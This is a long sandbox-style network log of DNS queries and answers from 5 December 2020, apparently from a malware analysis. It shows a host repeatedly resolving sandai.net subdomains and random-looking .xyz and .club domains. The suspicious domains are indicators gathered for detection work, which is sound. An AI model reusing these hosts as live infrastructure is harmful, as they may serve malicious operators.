                                                                                                                                                  Dec 5, 2020 08:43:59.448873997 CET192.168.2.38.8.8.80x3d74Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:59.980581999 CET192.168.2.38.8.8.80xdf01Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:00.497203112 CET192.168.2.38.8.8.80xbe4bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.016016006 CET192.168.2.38.8.8.80x841dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.558756113 CET192.168.2.38.8.8.80xf3dbStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.765913963 CET192.168.2.38.8.8.80x7c5Standard query (0)hub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.769349098 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.771750927 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.805136919 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.806685925 CET192.168.2.38.8.8.80x7007Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.807689905 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.810213089 CET192.168.2.38.8.8.80xaafdStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.847259045 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.848738909 CET192.168.2.38.8.8.80x297bStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.885165930 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.886617899 CET192.168.2.38.8.8.80xbbbaStandard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.922816038 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.923988104 CET192.168.2.38.8.8.80x9cd7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.959923029 CET192.168.2.38.8.8.80x7c7Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:01.961081028 CET192.168.2.38.8.8.80x95a8Standard query (0)score.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.075781107 CET192.168.2.38.8.8.80x112dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.258651018 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.260009050 CET192.168.2.38.8.8.80x4483Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.296370983 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.297508955 CET192.168.2.38.8.8.80x527Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.333282948 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.334471941 CET192.168.2.38.8.8.80xac55Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.371311903 CET192.168.2.38.8.8.80x7c6Standard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.373500109 CET192.168.2.38.8.8.80x3d9bStandard query (0)imhub5pr.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:02.606443882 CET192.168.2.38.8.8.80xcc35Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.137140989 CET192.168.2.38.8.8.80x833dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:03.686932087 CET192.168.2.38.8.8.80x75f8Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.230811119 CET192.168.2.38.8.8.80xdb3cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:04.763760090 CET192.168.2.38.8.8.80xd7ecStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.314198017 CET192.168.2.38.8.8.80x4d11Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:05.840318918 CET192.168.2.38.8.8.80xfc5cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.373202085 CET192.168.2.38.8.8.80x9a51Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:06.904190063 CET192.168.2.38.8.8.80x5ca0Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:07.454602003 CET192.168.2.38.8.8.80x7e7fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:07.996587992 CET192.168.2.38.8.8.80x30c1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:08.543495893 CET192.168.2.38.8.8.80xe50bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.090739965 CET192.168.2.38.8.8.80x44d1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:09.623686075 CET192.168.2.38.8.8.80xef1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.154020071 CET192.168.2.38.8.8.80xd095Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:10.701011896 CET192.168.2.38.8.8.80x7ed4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.232388973 CET192.168.2.38.8.8.80xa443Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:11.779169083 CET192.168.2.38.8.8.80xbcd9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:12.556914091 CET192.168.2.38.8.8.80xe663Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:13.165429115 CET192.168.2.38.8.8.80x711dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.356935978 CET192.168.2.38.8.8.80x2267Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:14.888703108 CET192.168.2.38.8.8.80x9788Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.421914101 CET192.168.2.38.8.8.80xdcafStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:15.970869064 CET192.168.2.38.8.8.80x122fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:16.517447948 CET192.168.2.38.8.8.80x8a7fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.044955015 CET192.168.2.38.8.8.80xd65dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:17.575695992 CET192.168.2.38.8.8.80x1808Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.123766899 CET192.168.2.38.8.8.80x905fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:18.669492006 CET192.168.2.38.8.8.80xfbd3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.217264891 CET192.168.2.38.8.8.80x44adStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:19.749089956 CET192.168.2.38.8.8.80x6843Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.296304941 CET192.168.2.38.8.8.80xca7dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:20.842305899 CET192.168.2.38.8.8.80x492Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.357323885 CET192.168.2.38.8.8.80x769fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:21.890527010 CET192.168.2.38.8.8.80x9e60Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.444001913 CET192.168.2.38.8.8.80x8d8fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:22.983156919 CET192.168.2.38.8.8.80x9f9bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:23.502736092 CET192.168.2.38.8.8.80xf2e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.046238899 CET192.168.2.38.8.8.80x434fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:24.591864109 CET192.168.2.38.8.8.80xf3f3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.124499083 CET192.168.2.38.8.8.80xf392Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:25.670666933 CET192.168.2.38.8.8.80xca6eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.218074083 CET192.168.2.38.8.8.80xb27dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:26.749294996 CET192.168.2.38.8.8.80xee8fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.264238119 CET192.168.2.38.8.8.80xb72cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:27.796911001 CET192.168.2.38.8.8.80x7fabStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.345057964 CET192.168.2.38.8.8.80x2273Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:28.874937057 CET192.168.2.38.8.8.80xd524Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.404752970 CET192.168.2.38.8.8.80xab11Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:29.942001104 CET192.168.2.38.8.8.80x7ec4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:30.538630962 CET192.168.2.38.8.8.80x58e1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.092473030 CET192.168.2.38.8.8.80xa3a5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:31.612140894 CET192.168.2.38.8.8.80x53cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.162920952 CET192.168.2.38.8.8.80xb3a6Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:32.686481953 CET192.168.2.38.8.8.80x1bd9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.233244896 CET192.168.2.38.8.8.80x3fdeStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:33.780996084 CET192.168.2.38.8.8.80xbae7Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.295671940 CET192.168.2.38.8.8.80x2cffStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:34.842538118 CET192.168.2.38.8.8.80x8f55Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.360580921 CET192.168.2.38.8.8.80xde4eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:35.905311108 CET192.168.2.38.8.8.80xefb1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:36.460200071 CET192.168.2.38.8.8.80x76e6Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.004929066 CET192.168.2.38.8.8.80xbfffStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:37.547617912 CET192.168.2.38.8.8.80x5b38Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.062274933 CET192.168.2.38.8.8.80x19afStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:38.577480078 CET192.168.2.38.8.8.80xb75dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.108922005 CET192.168.2.38.8.8.80x7d09Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:39.640337944 CET192.168.2.38.8.8.80xb04eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.195466042 CET192.168.2.38.8.8.80x14baStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:40.734242916 CET192.168.2.38.8.8.80x2ad0Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.249723911 CET192.168.2.38.8.8.80x9080Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:41.781835079 CET192.168.2.38.8.8.80xf744Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.316418886 CET192.168.2.38.8.8.80xd5c9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:42.843507051 CET192.168.2.38.8.8.80x8c9cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.386141062 CET192.168.2.38.8.8.80x55c1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:43.907150030 CET192.168.2.38.8.8.80x7badStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.437218904 CET192.168.2.38.8.8.80x405fStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:44.984076977 CET192.168.2.38.8.8.80x415dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:45.500381947 CET192.168.2.38.8.8.80x521cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.069277048 CET192.168.2.38.8.8.80x912aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:46.597650051 CET192.168.2.38.8.8.80xf57cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.150854111 CET192.168.2.38.8.8.80x2942Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:47.720201015 CET192.168.2.38.8.8.80xf3d4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.252520084 CET192.168.2.38.8.8.80xe143Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:48.798460960 CET192.168.2.38.8.8.80x59d5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.317466021 CET192.168.2.38.8.8.80x6525Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:49.859556913 CET192.168.2.38.8.8.80x2253Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.391560078 CET192.168.2.38.8.8.80xfacfStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:50.906727076 CET192.168.2.38.8.8.80x66cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.454305887 CET192.168.2.38.8.8.80xe583Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:51.970223904 CET192.168.2.38.8.8.80xfc99Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:52.522691011 CET192.168.2.38.8.8.80x20e2Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.047398090 CET192.168.2.38.8.8.80xbb96Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:53.563600063 CET192.168.2.38.8.8.80xdc95Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.095347881 CET192.168.2.38.8.8.80xc8d3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:54.626287937 CET192.168.2.38.8.8.80xd67eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.156809092 CET192.168.2.38.8.8.80xfcc1Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:55.688621998 CET192.168.2.38.8.8.80xd800Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.235286951 CET192.168.2.38.8.8.80x89abStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:56.756474972 CET192.168.2.38.8.8.80x8ec8Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.310049057 CET192.168.2.38.8.8.80x4c3Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:57.830212116 CET192.168.2.38.8.8.80xa191Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.378381014 CET192.168.2.38.8.8.80xea8bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:58.923456907 CET192.168.2.38.8.8.80xff92Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.453959942 CET192.168.2.38.8.8.80x7b7cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:44:59.989223003 CET192.168.2.38.8.8.80xefe7Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:00.532516956 CET192.168.2.38.8.8.80xcd07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.066127062 CET192.168.2.38.8.8.80x8b57Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:01.598042011 CET192.168.2.38.8.8.80x2300Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.144747019 CET192.168.2.38.8.8.80x2707Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:02.690109968 CET192.168.2.38.8.8.80x2276Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.221651077 CET192.168.2.38.8.8.80x1abaStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:03.736870050 CET192.168.2.38.8.8.80x146bStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.267421007 CET192.168.2.38.8.8.80xf9deStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:04.783400059 CET192.168.2.38.8.8.80xe7e9Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.330240965 CET192.168.2.38.8.8.80xee33Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:05.877887964 CET192.168.2.38.8.8.80xffeaStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.407953024 CET192.168.2.38.8.8.80x4136Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:06.940469980 CET192.168.2.38.8.8.80xbad5Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:07.470385075 CET192.168.2.38.8.8.80xfbb4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:07.985903025 CET192.168.2.38.8.8.80xac9dStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:08.503778934 CET192.168.2.38.8.8.80x214aStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.033617020 CET192.168.2.38.8.8.80x3d2eStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:09.566113949 CET192.168.2.38.8.8.80xf783Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.112205029 CET192.168.2.38.8.8.80xf14cStandard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:10.626859903 CET192.168.2.38.8.8.80xb07Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.142332077 CET192.168.2.38.8.8.80x6263Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:11.676170111 CET192.168.2.38.8.8.80xfa98Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.206394911 CET192.168.2.38.8.8.80xeaa4Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:45:12.737648010 CET192.168.2.38.8.8.80x9141Standard query (0)relay.phub.hz.sandai.netA (IP address)IN (0x0001)

                                                                                                                                                  DNS Answers

                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET8.8.8.8192.168.2.30x92a9No error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET8.8.8.8192.168.2.30x92a9No error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:41:53.382879019 CET8.8.8.8192.168.2.30x92a9No error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET8.8.8.8192.168.2.30xbe88No error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET8.8.8.8192.168.2.30xbe88No error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:42:48.097821951 CET8.8.8.8192.168.2.30xbe88No error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET8.8.8.8192.168.2.30x2421No error (0)1c5491a87d65f1ef.club172.67.142.39A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET8.8.8.8192.168.2.30x2421No error (0)1c5491a87d65f1ef.club104.27.183.69A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:12.422032118 CET8.8.8.8192.168.2.30x2421No error (0)1c5491a87d65f1ef.club104.27.182.69A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET8.8.8.8192.168.2.30xf72fNo error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET8.8.8.8192.168.2.30xf72fNo error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:28.410265923 CET8.8.8.8192.168.2.30xf72fNo error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET8.8.8.8192.168.2.30x34d3No error (0)ef6df4af06ba6896.xyz104.28.4.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET8.8.8.8192.168.2.30x34d3No error (0)ef6df4af06ba6896.xyz104.28.5.129A (IP address)IN (0x0001)
                                                                                                                                                  Dec 5, 2020 08:43:33.050405025 CET8.8.8.8192.168.2.30x34d3No error (0)ef6df4af06ba6896.xyz172.67.194.30A (IP address)IN (0x0001)
